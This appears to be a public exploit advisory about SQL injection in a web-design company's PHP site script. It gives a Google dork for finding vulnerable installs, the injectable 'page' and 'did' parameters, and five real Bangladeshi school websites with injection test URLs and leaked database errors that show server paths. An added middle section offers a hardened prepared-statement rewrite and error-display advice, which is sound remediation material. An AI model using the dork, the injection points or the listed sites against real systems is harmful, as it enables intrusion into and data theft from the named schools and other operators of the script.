Powered by NN Softech Web Design Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 09-10-2018
# Exploit Title : Powered by NN Softech Web Design Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Owner of the Script : bd.linkedin.com/in/sheikh-shaheen-30b40011a
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090020

#################################################################################################

# Google Dork : intext:''Powered by : NN SOFTECH''

# Exploit :

/index.php?page=[SQL Injection]

/news_events.php?page=[ID-NUMBER]&did=[SQL Injection]

#################################################################################################

# Example Site =>

1) cbsfmhs.edu.bd/news_events.php?page=1&did=52%27 => [ Proof of Concept ] => archive.is/eCGLQ

2) mgsc.edu.bd/index.php?page=43%27 => [ Proof of Concept ] => archive.is/61kCD

3) akpsc.edu.bd/news_events.php?page=1&did=52%27

4) ngghschool.edu.bd/news_events.php?page=1&did=50%27

5) ssidm.edu.bd/news_events.php?page=1&did=56%27

# Example SQL Database Error =>

Warning: mysql_fetch_assoc(): supplied argument is not a valid
MySQL result resource in /home/cbsm3x2s/public_html/news_events.php on line 131

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
/home/ngghscho61y0/public_html/news_events.php on line 131

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
/home/ngghscho61y0/public_html/news_events.php on line 145
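# The injectable pattern behind the "Exploit" entries above and the mysql_fetch_assoc() warnings quoted here both point at the same defect: a GET parameter spliced into a query string, with failures printed into the page. The following is an added example, not code from the NN Softech script; it shows the vulnerable shape as a comment next to a hardened lookup using validation and a prepared statement. The table name news_events, its columns and the SQLite demo data are assumptions chosen so the file runs offline.

```php
<?php
// Added example (not the vendor's code): hardened handling of the "did"
// parameter from news_events.php. Table/column names are assumptions.

// --- Vulnerable shape described by the advisory (comment only; do not use) ---
// $did = $_GET['did'];
// $res = mysql_query("SELECT * FROM news_events WHERE id=$did");
// $row = mysql_fetch_assoc($res); // emits the warning quoted above when the query fails

// --- Hardened version ---
function fetchNewsEvent(PDO $pdo, array $query): ?array
{
    // Accept only a positive integer; a value such as 52' is rejected here,
    // before anything reaches the database.
    $did = filter_var(
        $query['did'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($did === false) {
        return null; // caller should answer 400 Bad Request
    }

    // Prepared statement: the value is bound as data, never as SQL text.
    $stmt = $pdo->prepare('SELECT id, title FROM news_events WHERE id = :id');
    $stmt->bindValue(':id', $did, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demo on an in-memory SQLite database (constructed data).
$pdo = new PDO('sqlite::memory:');
// Exceptions instead of warnings: a failing query is handled by the error
// handler/log rather than printed into the HTML with the script's file path.
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news_events (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO news_events (id, title) VALUES (52, 'Annual sports day')");

// A well-formed id is looked up; malformed ids never produce a query.
$good = fetchNewsEvent($pdo, ['did' => '52']);
if ($good === null || $good['id'] != 52) {
    throw new RuntimeException('valid id should be found');
}
foreach (["52'", 'abc', '', '-1'] as $bad) {
    if (fetchNewsEvent($pdo, ['did' => $bad]) !== null) {
        throw new RuntimeException("malformed id '$bad' should be rejected");
    }
}
echo "news_events lookup: injection-safe\n";
```

The same treatment applies to the page parameter of index.php. Independently of the query fix, the warnings above reveal the hosting account path because PHP is configured to display errors; in production set display_errors=Off and log_errors=On so failures go to the server log only.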

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
